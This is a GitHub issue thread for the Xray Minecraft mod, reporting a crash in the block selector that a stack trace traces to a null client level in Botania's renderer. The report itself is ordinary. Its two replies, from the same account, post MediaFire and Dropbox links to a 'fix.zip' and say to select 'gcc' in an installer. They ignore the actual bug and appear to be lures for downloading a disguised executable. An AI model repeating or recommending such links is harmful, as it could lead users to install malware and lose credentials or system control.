### ISSUE TITLE
Critical bug/crash occurs while adding blocks to the xray config. 

### ISSUE THREAD

**Issue by chicken647** [ate47/Xray#120]
### The bug occurs without having Optifine or Optifabric installed? (Optifine bugs won't be fixed)

- [X] Yes, I don't have Optifine install.

### Mod version

2.3.1

### Minecraft version

1.20.1

### Mod loader

Forge

### Description of the issue

Attempting to add blocks to the xray config causes my game to crash. 

### Excepted behavior

To be able to search for blocks in the config menu or, click the arrows to navigate the xray block options. 

### Obtained behavior

Minecraft crash message: 
> The game crashed whilst rendering item
Error: java.lang.NullPointerException: Cannot invoke "net.minecraft.client.multiplayer.ClientLevel.m_46471_()" because "net.minecraft.client.Minecraft.m_91087_().f_91073_" is null

Log file crash message: 

> [11:32:43] [Render thread/WARN]: Game took 100.696 seconds to start
[11:33:29] [Render thread/INFO]: Released client Flux Networks cache
[11:33:29] [Render thread/ERROR]: Reported exception thrown!
net.minecraft.ReportedException: Rendering item
	at net.minecraft.client.renderer.GameRenderer.m_109093_(GameRenderer.java:978) ~[client-1.20.1-20230612.114412-srg.jar%231006!/:?]
	at net.minecraft.client.Minecraft.m_91383_(Minecraft.java:1146) ~[client-1.20.1-20230612.114412-srg.jar%231006!/:?]
	at net.minecraft.client.Minecraft.m_91374_(Minecraft.java:718) ~[client-1.20.1-20230612.114412-srg.jar%231006!/:?]
	at net.minecraft.client.main.Main.main(Main.java:218) ~[forge-47.2.20.jar:?]
	at jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[?:?]
	at jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:77) ~[?:?]
	at jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[?:?]
	at java.lang.reflect.Method.invoke(Method.java:568) ~[?:?]
	at net.minecraftforge.fml.loading.targets.CommonLaunchHandler.runTarget(CommonLaunchHandler.java:111) ~[fmlloader-1.20.1-47.2.20.jar:?]
	at net.minecraftforge.fml.loading.targets.CommonLaunchHandler.clientService(CommonLaunchHandler.java:99) ~[fmlloader-1.20.1-47.2.20.jar:?]
	at net.minecraftforge.fml.loading.targets.CommonClientLaunchHandler.lambda$makeService$0(CommonClientLaunchHandler.java:25) ~[fmlloader-1.20.1-47.2.20.jar:?]
	at cpw.mods.modlauncher.LaunchServiceHandlerDecorator.launch(LaunchServiceHandlerDecorator.java:30) ~[modlauncher-10.0.9.jar:?]
	at cpw.mods.modlauncher.LaunchServiceHandler.launch(LaunchServiceHandler.java:53) ~[modlauncher-10.0.9.jar:?]
	at cpw.mods.modlauncher.LaunchServiceHandler.launch(LaunchServiceHandler.java:71) ~[modlauncher-10.0.9.jar:?]
	at cpw.mods.modlauncher.Launcher.run(Launcher.java:108) ~[modlauncher-10.0.9.jar:?]
	at cpw.mods.modlauncher.Launcher.main(Launcher.java:78) ~[modlauncher-10.0.9.jar:?]
	at cpw.mods.modlauncher.BootstrapLaunchConsumer.accept(BootstrapLaunchConsumer.java:26) ~[modlauncher-10.0.9.jar:?]
	at cpw.mods.modlauncher.BootstrapLaunchConsumer.accept(BootstrapLaunchConsumer.java:23) ~[modlauncher-10.0.9.jar:?]
	at cpw.mods.bootstraplauncher.BootstrapLauncher.main(BootstrapLauncher.java:141) ~[bootstraplauncher-1.1.2.jar:?]
Caused by: java.lang.NullPointerException: Cannot invoke "net.minecraft.client.multiplayer.ClientLevel.m_46471_()" because "net.minecraft.client.Minecraft.m_91087_().f_91073_" is null
	at vazkii.botania.client.model.TeruTeruBozuModel.m_7695_(TeruTeruBozuModel.java:57) ~[Botania-1.20.1-445-FORGE.jar%23640!/:1.20.1-445-FORGE]
	at vazkii.botania.client.render.block_entity.TeruTeruBozuBlockEntityRenderer.render(TeruTeruBozuBlockEntityRenderer.java:60) ~[Botania-1.20.1-445-FORGE.jar%23640!/:1.20.1-445-FORGE]
	at vazkii.botania.client.render.block_entity.TeruTeruBozuBlockEntityRenderer.m_6922_(TeruTeruBozuBlockEntityRenderer.java:31) ~[Botania-1.20.1-445-FORGE.jar%23640!/:1.20.1-445-FORGE]
	at vazkii.botania.client.render.block_entity.TEISR.render(TEISR.java:43) ~[Botania-1.20.1-445-FORGE.jar%23640!/:1.20.1-445-FORGE]
	at vazkii.botania.forge.client.ForgeBlockEntityItemRendererHelper$1.m_108829_(ForgeBlockEntityItemRendererHelper.java:32) ~[Botania-1.20.1-445-FORGE.jar%23640!/:1.20.1-445-FORGE]
	at net.minecraft.client.renderer.entity.ItemRenderer.m_115143_(ItemRenderer.java:151) ~[client-1.20.1-20230612.114412-srg.jar%231006!/:?]
	at net.minecraft.client.gui.GuiGraphics.m_280405_(GuiGraphics.java:483) ~[client-1.20.1-20230612.114412-srg.jar%231006!/:?]
	at net.minecraft.client.gui.GuiGraphics.m_280053_(GuiGraphics.java:466) ~[client-1.20.1-20230612.114412-srg.jar%231006!/:?]
	at net.minecraft.client.gui.GuiGraphics.m_280480_(GuiGraphics.java:446) ~[client-1.20.1-20230612.114412-srg.jar%231006!/:?]
	at fr.atesab.xray.utils.GuiUtils.renderItemIdentity(GuiUtils.java:662) ~[XrayMod-2.3.1.jar%23991!/:2.3.1]
	at fr.atesab.xray.screen.BlockSelector.m_88315_(BlockSelector.java:153) ~[XrayMod-2.3.1.jar%23991!/:2.3.1]
	at net.minecraft.client.gui.screens.Screen.m_280264_(Screen.java:109) ~[client-1.20.1-20230612.114412-srg.jar%231006!/:?]
	at net.minecraftforge.client.ForgeHooksClient.drawScreenInternal(ForgeHooksClient.java:427) ~[forge-1.20.1-47.2.20-universal.jar%231011!/:?]
	at net.minecraftforge.client.ForgeHooksClient.drawScreen(ForgeHooksClient.java:420) ~[forge-1.20.1-47.2.20-universal.jar%231011!/:?]
	at net.minecraft.client.renderer.GameRenderer.m_109093_(GameRenderer.java:965) ~[client-1.20.1-20230612.114412-srg.jar%231006!/:?]
	... 18 more

### How to reproduce

_Using Forge 47.2.0, on Minecraft 1.20.1 with the Curseforge modpack "All the mods 9"._ 

Run your game, while on the main menu, click mods then search for this Xray mod. Next, click "config" which opens the mod gui with the Esp, Xray, etc options. Next click "Xray" and add a new Xray config option, click the "+" to add a block to the Xray and either click the arrows to move the inventory to the next page a few times or, search for a block _(I looked for the modded ore block (allthemodium ore))_. This causes my game to crash everytime without fail. Even without being in a world. 

### Do I want to contribute to fix it?

None

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
